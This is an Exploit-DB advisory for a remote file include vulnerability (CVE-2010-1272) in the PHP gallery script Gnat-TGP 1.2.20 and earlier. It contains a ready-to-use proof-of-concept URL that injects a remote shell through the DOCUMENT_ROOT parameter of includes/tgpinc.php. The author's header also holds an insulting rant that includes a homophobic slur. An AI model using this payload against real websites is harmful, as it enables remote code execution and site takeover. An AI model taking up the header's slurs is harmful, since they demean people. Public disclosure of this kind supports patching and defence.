Gnat-TGP <= 1.2.20 - Remote File Include Vulnerability

2010-03-03T00:00:00
ID EDB-ID:11621
Type exploitdb
Reporter cr4wl3r
Modified 2010-03-03T00:00:00

Description

Gnat-TGP <= 1.2.20 Remote File Include Vulnerability. CVE-2010-1272. Webapps exploit for php platform

                                        
                                            ###############################################################
# Gnat-TGP &lt;= 1.2.20 Remote File Include Vulnerability
# By cr4wl3r
# Download: http://www.komputer.boo.pl/download/skrypty/galerie/gnat-tgp.rar
# Gr33tz: EA ngel, Hmei7, zvtral, mywisdom and all my friend
###############################################################
###############################################################
# Fuck to buat loe tukang show off, dan buat loe yang mengaku dirinya hacker dan pamer sana-sini
# mengatakan orang lain lamer karena suka deface sedangkan dirinya adalah tukang deface
# you are 1337 lamer 1337 hoax and 1337 gay
# i'm injector and rooter in the site and i'm be silent
###############################################################
###############################################################

# PoC: http://server/includes/tgpinc.php?DOCUMENT_ROOT=[Shell]

###############################################################